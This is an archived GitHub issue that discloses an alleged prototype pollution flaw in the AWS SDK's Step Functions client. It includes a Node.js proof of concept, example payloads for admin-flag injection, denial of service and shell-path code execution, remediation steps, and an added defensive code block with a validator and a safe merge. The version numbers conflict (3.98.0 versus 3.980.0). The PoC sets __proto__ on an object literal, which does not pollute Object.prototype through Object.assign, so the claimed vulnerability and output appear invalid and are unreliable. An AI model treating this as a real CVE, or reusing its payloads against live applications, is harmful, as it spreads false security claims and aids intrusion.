This repository was archived by the owner on Mar 9, 2026. It is now read-only.

Prototype Pollution in @aws-sdk/client-sfn <= 3.98.0 via Improper Configuration Merge #4713

@dfzysmy2tf-create

Description


Describe the bug

Summary

A prototype pollution vulnerability exists in @aws-sdk/client-sfn version 3.980.0 and earlier. The SFNClient constructor accepts a configuration object that is improperly merged using Object.assign(), allowing attackers to inject properties into Object.prototype via the __proto__ accessor. This can lead to application-wide property injection, denial of service, authentication bypass, or potentially remote code execution depending on how the polluted properties are utilized downstream.

Details

The vulnerability exists in the endpoint parameter resolution logic within the SFNClient initialization flow. When a new SFNClient instance is created, the user-provided configuration object flows through resolveClientEndpointParameters(), which performs unsafe object merging operations.

Vulnerable Code Location:

  • File: package/dist-es/endpoint/EndpointParameters.js
  • Line: 2

Root Cause:

The vulnerable code uses Object.assign() with user-controlled input as the first argument:

return Object.assign(options, {...})

When options contains a __proto__ property, Object.assign() treats it as a regular property assignment, which results in pollution of Object.prototype rather than creating a new property on the target object.

Additional Vulnerable Sinks:

Multiple Object.assign() calls in the initialization chain compound this vulnerability:

  1. Line 6: const extensionConfiguration = Object.assign(getAw...
  2. Line 8: return Object.assign(runtimeConfig, resolveAwsRegi...
  3. Line 2: return Object.assign(options, {...} (primary sink)

Each of these merge operations can propagate or introduce prototype pollution when handling untrusted configuration objects.

PoC

Steps to Reproduce

  1. Install the vulnerable package:

    npm install @aws-sdk/client-sfn@3.980.0
  2. Create a test file (test-pollution.js):

    const { SFNClient } = require('@aws-sdk/client-sfn');
    
    // Verify Object.prototype is clean before test
    console.log('Before pollution:', Object.prototype.polluted); // undefined
    
    // Create SFNClient with malicious __proto__ payload
    const client = new SFNClient({
      __proto__: { 
        polluted: 'value',
        isAdmin: true
      },
      region: 'us-east-1',
      credentials: {
        accessKeyId: 'test',
        secretAccessKey: 'test'
      }
    });
    
    // Verify prototype pollution occurred
    console.log('After pollution:', Object.prototype.polluted); // 'value'
    console.log('After pollution:', Object.prototype.isAdmin); // true
    
    // Demonstrate impact on unrelated objects
    const cleanObject = {};
    console.log('Clean object polluted property:', cleanObject.polluted); // 'value'
    console.log('Clean object isAdmin:', cleanObject.isAdmin); // true
  3. Execute the test:

    node test-pollution.js

Expected Behavior

The __proto__ property should be treated as a regular configuration property or rejected entirely. Object.prototype should remain unpolluted, and unrelated objects should not inherit the injected properties.

Actual Behavior

The __proto__ property successfully pollutes Object.prototype. All JavaScript objects in the application inherit the injected properties (polluted: 'value', isAdmin: true), demonstrating successful prototype pollution.

Output:

Before pollution: undefined
After pollution: value
After pollution: true
Clean object polluted property: value
Clean object isAdmin: true

Impact

This prototype pollution vulnerability poses a HIGH severity risk with the following potential impacts:

1. Property Injection

Attackers can inject arbitrary properties into all JavaScript objects throughout the application, affecting:

  • Object comparisons and conditional logic
  • Default values and fallback mechanisms
  • Authorization and authentication checks

2. Denial of Service (DoS)

By polluting critical properties or methods:

__proto__: { toString: null, valueOf: null }

This can crash the application when objects attempt to use these fundamental methods.

3. Authentication/Authorization Bypass

If the application uses object properties for access control:

__proto__: { isAdmin: true, role: 'administrator' }

This could bypass security checks that rely on undefined properties defaulting to falsy values.

4. Remote Code Execution (RCE) - Context Dependent

If polluted properties flow into dangerous sinks such as:

  • Template engines
  • eval() or Function() constructors
  • child_process module
  • Dynamic code execution paths

Example attack chain:

__proto__: { shell: '/bin/bash', execPath: '/malicious/script' }

5. Supply Chain Impact

Applications using @aws-sdk/client-sfn that accept user-controlled configuration (directly or indirectly) are vulnerable. This is particularly concerning in:

  • Multi-tenant cloud applications
  • Serverless functions processing untrusted input
  • API gateways that forward configuration parameters
  • CI/CD pipelines with user-defined workflows

Remediation Recommendations

  1. Immediate: Upgrade to a patched version when available
  2. Mitigation: Use Object.create(null) for configuration objects or implement input validation to reject __proto__, constructor, and prototype keys
  3. Defense-in-depth: Enable --disable-proto=delete flag in Node.js where possible
  4. Code Review: Audit all Object.assign() usage with external input
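
The following is an added example of recommendations 2 and 4, not code from the report or from the AWS SDK: a validator that rejects the three prototype-reaching keys at any depth of an untrusted (JSON-parsed) configuration object, a merge that copies own keys onto a null-prototype target instead of calling Object.assign() on caller input, and a check a test suite can run to confirm Object.prototype was not modified. The property names, the constructed JSON input and the helper names are assumptions.

```javascript
'use strict';
// Added example (not part of the report or the AWS SDK): reject keys that can
// reach Object.prototype and merge configuration onto a prototype-less target.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Walk an untrusted configuration object (e.g. the result of JSON.parse, where
// "__proto__" becomes an own property) and throw on a forbidden key at any depth.
function assertNoPrototypeKeys(value, path = 'config') {
  if (value === null || typeof value !== 'object') return value;
  for (const key of Object.keys(value)) {
    if (FORBIDDEN_KEYS.has(key)) {
      throw new TypeError(`Rejected key "${key}" at ${path}`);
    }
    assertNoPrototypeKeys(value[key], `${path}.${key}`);
  }
  return value;
}

// Merge own enumerable keys of each source into a fresh Object.create(null)
// object; forbidden keys are dropped so nothing can reach the shared prototype.
function safeMerge(...sources) {
  const target = Object.create(null);
  for (const source of sources) {
    if (source === null || typeof source !== 'object') continue;
    for (const key of Object.keys(source)) {
      if (FORBIDDEN_KEYS.has(key)) continue;
      target[key] = source[key];
    }
  }
  return target;
}

// Regression check for a test suite: true when none of the given names are
// visible on Object.prototype (own or inherited).
function prototypeIsClean(names) {
  return names.every((name) => !(name in Object.prototype));
}

// Constructed untrusted input: a JSON body carrying a "__proto__" key.
const UNTRUSTED_JSON = '{"region":"us-east-1","__proto__":{"isAdmin":true}}';

function demo() {
  const untrusted = JSON.parse(UNTRUSTED_JSON);
  let rejected = false;
  try { assertNoPrototypeKeys(untrusted); } catch (e) { rejected = true; }
  const merged = safeMerge({ maxAttempts: 3 }, untrusted);
  return { rejected, merged, clean: prototypeIsClean(['isAdmin', 'polluted']) };
}
```

Running demo() rejects the input at config.__proto__, and the merged object keeps region and maxAttempts with no prototype for a stray key to land on.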

CVSS Score Estimate: 7.5 - 8.1 (HIGH)
CWE: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes)
